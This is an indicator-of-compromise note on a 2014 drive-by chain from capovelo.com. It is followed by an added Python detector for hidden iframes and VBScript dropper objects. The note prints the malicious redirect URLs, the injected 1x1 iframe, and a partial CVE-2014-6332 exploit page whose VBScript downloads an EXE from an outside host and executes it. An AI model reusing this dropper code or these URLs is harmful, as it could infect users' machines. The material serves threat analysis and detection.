// IOC - capovelo.com - 2014-12-18
// Visiting 'capovelo.com' might initiate a redirect chain that ends up on a website hosting a CVE-2014-6332 exploit. Successful exploitation leads to downloading a variant of Andromeda malware - https://www.virustotal.com/en/file/6cc32beb7932f50e143033d7b50e4d278636510b6f186c863492296b6feb134a/analysis/
// The redirect chain can be triggered by visiting - http://capovelo.com/community/page/index.html/_/articles/frontpage/thomas-weisel-responds-to-lance-armstrongs-r271
// The returned page contains the following <iframe>:
<iframe src="http://www.beyondrealitypack.com/Forums/uploads/monthly_12_2013/index.php?out=1418488864" width="1" height="1" frameborder="0"></iframe>
// When requested, it returns a 302 pointing at - http://fabesinternational.com/wp-content/plugins/wp_module/iee.php
// 'iee.php' contains exploit code for CVE-2014-6332. Partial example of the code:
<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
oXMLHTTP.Open "GET", "http://fabesinternational.com/wp-content/plugins/wp_module/calc.exe", 0
oXMLHTTP.Send
Set oADOStream = CreateObject("ADODB.Stream")
oADOStream.Mode = 3 '?????????? ?? ?????? ? ??????
oADOStream.Type = 1 '??? ?????? - Binary
oADOStream.Open
oADOStream.Write oXMLHTTP.responseBody
oADOStream.SaveToFile "cal.exe", 2
set shell = createobject("Shell.Application")
shell.ShellExecute "cal.exe"
end function
</script>
<SCRIPT LANGUAGE="VBScript">
dim aa()
dim ab()
dim a0
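Added detection example, not part of this paste: a small Python checker for the two indicators described above, the 1x1 hidden <iframe> injected into the landing page and the XMLHTTP / ADODB.Stream / Shell.Application download-and-execute chain in the VBScript. The sample pages are constructed from the snippets above, not captured traffic.

```python
import re
from html.parser import HTMLParser

# Constructed samples (not captured traffic) echoing the two stages described above: the landing
# page with its injected 1x1 <iframe>, and an exploit page whose VBScript fetches, writes and runs an EXE.
LANDING_PAGE = '''<html><body><p>article text</p>
<iframe src="http://www.beyondrealitypack.com/Forums/uploads/monthly_12_2013/index.php?out=1418488864" width="1" height="1" frameborder="0"></iframe>
</body></html>'''
EXPLOIT_PAGE = '''<html><body><SCRIPT LANGUAGE="VBScript">
Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")
Set oADOStream = CreateObject("ADODB.Stream")
set shell = createobject("Shell.Application")
</script></body></html>'''
BENIGN_PAGE = '<iframe src="https://example.org/embed" width="560" height="315"></iframe>'

# COM objects that together form the VBScript download-and-execute dropper.
DROPPER_OBJECTS = ("MSXML2.XMLHTTP", "ADODB.Stream", "Shell.Application")

class HiddenIframeFinder(HTMLParser):
    """Collects the src of every <iframe> whose width and height are both numeric and <= 1 px."""
    def __init__(self):
        super().__init__()
        self.hidden = []
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k.lower(): v for k, v in attrs}
        w, h = (re.match(r"\s*(\d+)", a.get(n) or "") for n in ("width", "height"))
        if w and h and int(w.group(1)) <= 1 and int(h.group(1)) <= 1:
            self.hidden.append(a.get("src") or "")

def find_hidden_iframes(html):
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.hidden

def vbscript_dropper_markers(html):
    """Dropper COM objects instantiated inside VBScript <script> blocks, in chain order."""
    found = []
    for body in re.findall(r"<script[^>]*vbscript[^>]*>(.*?)</script>", html, re.I | re.S):
        for obj in DROPPER_OBJECTS:
            if obj not in found and re.search(r'createobject\s*\(\s*"' + re.escape(obj) + '"', body, re.I):
                found.append(obj)
    return found

def assess(html):
    # 'suspicious' on any hidden iframe or on the complete three-object dropper, else 'clean'
    iframes, markers = find_hidden_iframes(html), vbscript_dropper_markers(html)
    verdict = "suspicious" if iframes or len(markers) == len(DROPPER_OBJECTS) else "clean"
    return {"hidden_iframes": iframes, "dropper_markers": markers, "verdict": verdict}
```

Run it over saved HTTP responses from a proxy or sandbox; a hidden iframe alone is only an indicator to pivot on, while the full three-object chain inside VBScript is rarely legitimate.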